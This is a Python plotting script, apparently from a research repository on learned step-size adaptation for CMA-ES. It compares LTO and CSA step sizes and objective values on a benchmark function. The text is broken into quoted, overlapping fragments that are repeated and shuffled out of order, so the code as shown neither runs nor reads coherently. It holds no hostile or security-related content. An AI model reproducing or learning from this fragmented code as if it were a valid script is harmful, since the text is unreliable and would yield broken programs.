rcParams['ytick.minor.width']", "fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] +", "= 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] =", "rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size']", "parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being", "rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize']", "sns import matplotlib.pyplot as plt import argparse from datetime import datetime sns.set() from", "<reponame>shercklo/LTO-CMA import os import json import numpy as np import seaborn as sns", "to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\",", "'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k'", "file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path", "LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)),", "np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std", "function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\",", "= (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle']", "parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function = args.function popsize = 10", "= 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] =", "LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4,", "6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if", "with open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval", "type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the", "help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA", "np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) +", "rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is", "Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) +", "rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha']", "ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)]", "else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"% path) parser", "alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma", "= \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type,", "being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function", "import os import json import numpy as np import seaborn as sns import", "+ [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs", "10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)),", "rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k'", "rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True", "help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path", "False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] =", "rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size']", "data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path", "lto_path = args.lto_path csa_path = args.csa_path function = args.function popsize = 10 data_LTO", "+ 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs", "Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for", "plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"],", "path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"% path)", "data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4,", "\"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file", "plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std", "costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"],", "= 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return", "CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path", "data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average", "= len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25,", "+ 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"],", "open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval =", "= 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] =", "data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"])", "os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a", "the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\",", "json import numpy as np import seaborn as sns import matplotlib.pyplot as plt", "len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2)", "import matplotlib.pyplot as plt import argparse from datetime import datetime sns.set() from matplotlib", "valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test", "'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6", "stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma", "* 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"])", "args.lto_path csa_path = args.csa_path function = args.function popsize = 10 data_LTO = {}", "plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations,", "to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data", "CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma", "label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs", "{} data_CSA = {} with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path)", "1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"],", "LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"])", "LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\",", "sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] =", "plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function =", "LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma", "csa_path = args.csa_path function = args.function popsize = 10 data_LTO = {} data_CSA", "matplotlib.pyplot as plt import argparse from datetime import datetime sns.set() from matplotlib import", "data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std", "generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0,", "= {} data_CSA = {} with open(lto_path) as json_file: data_LTO = json.load(json_file) with", "plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective", "+ 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path =", "= 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] =", "as plt import argparse from datetime import datetime sns.set() from matplotlib import rcParams", "Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\",", "= 10 data_LTO = {} data_CSA = {} with open(lto_path) as json_file: data_LTO", "rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width']", "len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma", "data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs", "data_CSA = {} with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as", "plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time", "1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\")", "CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"])", "costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)),", "path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to", "color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now()", "data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function',", "rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size']", "linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp", "parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path", "a valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO", "to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path',", "= 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] =", "str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x',", "= parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function = args.function popsize =", "CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True)", "fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen *", "fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen", "np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1,", "LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"])", "np import seaborn as sns import matplotlib.pyplot as plt import argparse from datetime", "= 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path):", "plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)]", "= 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] =", "os import json import numpy as np import seaborn as sns import matplotlib.pyplot", "costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"])", "rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor']", "6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6", "LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average", "plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] +", "plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor')", "datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] =", "plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std", "which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1,", "gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs", "in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"],", "CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]),", "[str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma", "rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path else:", "the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args =", "{} with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA", "* 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) +", "json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"])", "% (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2)", "type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' %", "= 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color']", "in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"],", "FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10)", "costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs", "np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1,", "CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1,", "color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"],", "datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file),", "plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function)", "os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type,", "alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type", "function = args.function popsize = 10 data_LTO = {} data_CSA = {} with", "data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now()", "plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf'", "LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1,", "= False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor']", "rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k'", "rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize']", "0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True'", "costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num", "step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]),", "= json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs", "CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args()", "import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] =", "(16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] =", "CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4,", "+ [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1,", "[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average", "a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path,", "label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp =", "stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs", "data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path", "+ 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs", "rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def", "fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10,", "1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]),", "len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type", "step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1,", "costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"],", "open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file)", "FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) 